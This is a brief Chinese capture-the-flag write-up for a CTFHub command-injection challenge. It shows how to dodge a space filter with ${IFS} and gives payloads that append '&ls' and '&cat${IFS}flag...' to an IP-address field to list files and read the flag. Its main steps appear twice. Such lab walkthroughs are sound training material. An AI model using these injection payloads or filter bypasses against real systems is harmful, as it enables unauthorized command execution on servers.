RCE8-文件包含/命令注入/过滤空格(通过${IFS}过滤空格)
一.题目链接:
https://www.ctfhub.com/#/skilltree
二.基础知识
2.1 怎么绕过过滤空格
1.这里就用${IFS}吧,这个比较通用
三.开始解题
1.通过下面的playload查看文件
192.168.20.14&ls
2.查看flag文件内容
192.168.20.14&cat${IFS}flag_38191261618112.php
https://www.ctfhub.com/#/skilltree
2.1 怎么绕过过滤空格
1.这里就用${IFS}吧,这个比较通用
1.通过下面的playload查看文件
192.168.20.14&ls
2.查看flag文件内容
192.168.20.14&cat${IFS}flag_38191261618112.php
浙公网安备 33010602011771号